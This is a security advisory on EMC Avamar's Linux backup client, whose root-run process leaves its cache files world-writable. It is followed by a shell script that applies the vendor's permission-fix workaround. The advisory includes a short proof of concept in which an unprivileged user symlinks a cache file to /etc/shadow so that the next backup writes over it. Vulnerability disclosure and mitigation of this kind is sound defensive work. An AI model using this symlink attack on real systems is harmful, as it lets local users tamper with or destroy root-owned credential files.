`Product: Avamar backup client for Linux (Probably also Unix, but not tested)
Vendor: EMC (http://www.emc.com)
Tested version: 6.1.100-402 (Latest)
Vendor Notification: December 17, 2012
Vendor Patch: None
Vendor Workaround: <quote>workaround is to run a script at the end of each backup which set the files permissions to be read/write for the owner only</quote>
Vendor Response: Will maybe be patched in version 7 mid-2013 since EMC does not patch for security
Solution Status: None
Risk Level: High
Details:
The Avamar client runs as root, and after each backup it leaves the cache files world-writable:
# ls -latr /var/avamar/f_cache.dat
-rw-rw-rw- 1 root root 11534880 Dec 17 10:30 /var/avamar/f_cache.dat
# ls -latr /var/avamar/p_cache.dat
-rw-rw-rw- 1 root root 3146272 Dec 17 10:30 /var/avamar/p_cache.dat
Fun && profit:
# id
uid=1000(slave) gid=1000(slave) groups=1000(slave)
# cd /var/avamar
# ln -sf /etc/shadow p_cache.dat
and wait for the next backup window.
`
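The vendor workaround quoted above (a post-backup script that sets the cache files to owner-only read/write), written out as an added example; it is not EMC's or the advisory author's code. The function names are hypothetical and the `*_cache.dat` pattern is assumed from the two file names shown; symlinks are reported instead of fixed, because chmod follows a link and would change its target.

```shell
#!/bin/sh
# Added example: post-backup permission fix for the Avamar client cache files.
# Function names are hypothetical; the *_cache.dat pattern is an assumption
# based on f_cache.dat and p_cache.dat from the advisory.

# Print the octal mode of a path (GNU stat first, BSD stat as fallback).
mode_of() {
    stat -c '%a' "$1" 2>/dev/null || stat -f '%Lp' "$1"
}

# fix_cache_perms DIR
#   symlink named *_cache.dat      -> report "SYMLINK", never chmod it
#   regular file with g/o bits set -> chmod 600, report "FIXED"
# Returns 1 if any symlink was found (needs investigation), else 0.
fix_cache_perms() {
    dir="$1"
    rc=0
    for f in "$dir"/*_cache.dat; do
        # Skip the unexpanded glob; keep dangling symlinks in scope.
        [ -e "$f" ] || [ -L "$f" ] || continue
        if [ -L "$f" ]; then
            echo "SYMLINK $f"
            rc=1
            continue
        fi
        [ -f "$f" ] || continue
        m=$(mode_of "$f")
        case "$m" in
            0|*00) ;;   # group and other already have no access
            *) chmod 600 "$f" && echo "FIXED $f (was $m)" ;;
        esac
    done
    return $rc
}

# Usage from a post-backup hook (path as shown in the advisory):
#   fix_cache_perms /var/avamar || logger -p auth.warning "symlinked Avamar cache file found"
```

The files stay world-writable from the moment the backup writes them until this runs, so it shortens the exposure window and does not close it.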